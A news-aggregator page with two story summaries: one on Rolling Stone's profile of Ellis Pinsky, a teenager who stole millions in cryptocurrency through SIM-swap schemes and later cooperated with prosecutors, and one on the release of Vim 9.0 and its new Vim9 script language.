What Happened to the Teen Who Stole $23.8M in Cryptocurrency? (rollingstone.com) 67

15-year-old Ellis Pinsky stole $23.8 million worth of cryptocurrency — and his life was never the same. For example, Rolling Stone reports, in his last year of high school, "Four men wearing ski masks and gloves, armed with knives, rope, brass knuckles, and a fake 9 mm," crept around the back of his home in the suburbs: Two weeks before the break-in, a lawsuit had been filed against him, and news stories had circulated connecting him to the hack. He knew that the thieves wanted this money, the millions and millions of dollars he had stolen. He also knew that he couldn't give it to them. He didn't have it. Not anymore.
The magazine paints the portrait of "an anxious young man in Invisalign braces" who describes the revelation he'd had at the age of 13. "The internet held such secrets. All he had to do was uncover them." As he soon found, there were plenty of people working to uncover them all the time, and willing to share their methods — for a price.... Realizing that a lot of the information social engineers used came from hacked databases, he began teaching himself to program, particularly to do the Structured Query Language injections and cross-site scripting that allowed him to attack companies' database architecture. The terabyte upon terabyte of databases he extracted, traded, and hoarded made him valuable to OGUsers as well as to others, like the Russian hackers he was able to converse with thanks to his fluency with his mother's native language... By the time he was 14, he tells me, "I think it's fair to say I had the capabilities to hack anyone."
The article describes him as "attending high school by day and extracting the source code of major corporations by night.... He was 14 years old and taken with the thrill of possessing a hidden superpower, of spending his nights secretly tapping into an underground world where he was esteemed and even feared. And then, in the morning, being called downstairs to breakfast." He wrote a Python script to comb through social media networks and seek out any mentions of working for a [cellphone] carrier. Then he'd reach out with an offer of compensation for helping him with a task. Every fifth or sixth person — underpaid and often working a short-term contract — would say they were game, as Pinsky tells it. For a couple hundred dollars' worth of bitcoin, they'd be willing to do a SIM swap, no questions asked. Eventually, Pinsky says, he had employees at every major carrier also working for him. Then the stakes got even higher. It was only a matter of time before OG hackers, known to each other as "the Community," realized that if they could use the SIM-swapping method to steal usernames, they could just as easily use it to steal cryptocurrency...
In one massive heist Pinsky stole 10% of all the Trigger altcoins on the market from crypto impresario Michael Terpin. ("As Pinsky's money launderers were converting it, the market was crashing in real time.") Pinsky recruited a crew to launder the money — at least one of which simply kept it — but even with all the conversion fees, he still made off with millions. And then... For a while, he half-expected the FBI to knock on his door at any moment, just like in the movies; but as time passed, he grew less anxious.... He says he moved on to learning different types of programming. He ran a sneaker business that used bots and scripts to snap up limited pairs then flip them... He went to soccer practice. He and his friends had started hanging out with girls on the weekend, driving down to the docks where you could see the glowing lights from the Tappan Zee Bridge.
Until Terpin figured out it was Pinsky who'd robbed him: Pinsky and his legal team preempted his arrest by contacting the U.S. attorney directly and offering his cooperation. In February 2020, he voluntarily returned every last thing he says he got from the Terpin heist: 562 bitcoins, the Patek watch, and the cash he'd stored in the safe under his bed.... When I ask if he has also worked with the FBI to help bring down other hackers, he blinks quickly and then changes the subject.
Pinsky has not been criminally charged — partly because he was a minor, but also because of his cooperation with law enforcement. But filing a civil suit, Terpin wants to be compensated with triple the amount stolen, arguing that the teenager who robbed him was running an organized crime racket and that he should be heavily punished to set an example.

Rolling Stone's article raises the question: what should happen next?

Programming

Vim 9.0 Released (vim.org) 81

After many years of gradual improvement Vim now takes a big step with a major release. Besides many small additions the spotlight is on a new incarnation of the Vim script language: Vim9 script. Why Vim9 script: A new script language, what is that needed for? Vim script has been growing over time, while preserving backwards compatibility. That means bad choices from the past often can't be changed and compatibility with Vi restricts possible solutions. Execution is quite slow, each line is parsed every time it is executed.

The main goal of Vim9 script is to drastically improve performance. This is accomplished by compiling commands into instructions that can be efficiently executed. An increase in execution speed of 10 to 100 times can be expected. A secondary goal is to avoid Vim-specific constructs and get closer to commonly used programming languages, such as JavaScript, TypeScript and Java.

The performance improvements can only be achieved by not being 100% backwards compatible. For example, making function arguments available by creating an "a:" dictionary involves quite a lot of overhead. In a Vim9 function this dictionary is not available. Other differences are more subtle, such as how errors are handled. For those with a large collection of legacy scripts: Not to worry! They will keep working as before. There are no plans to drop support for legacy script. No drama like with the deprecation of Python 2.
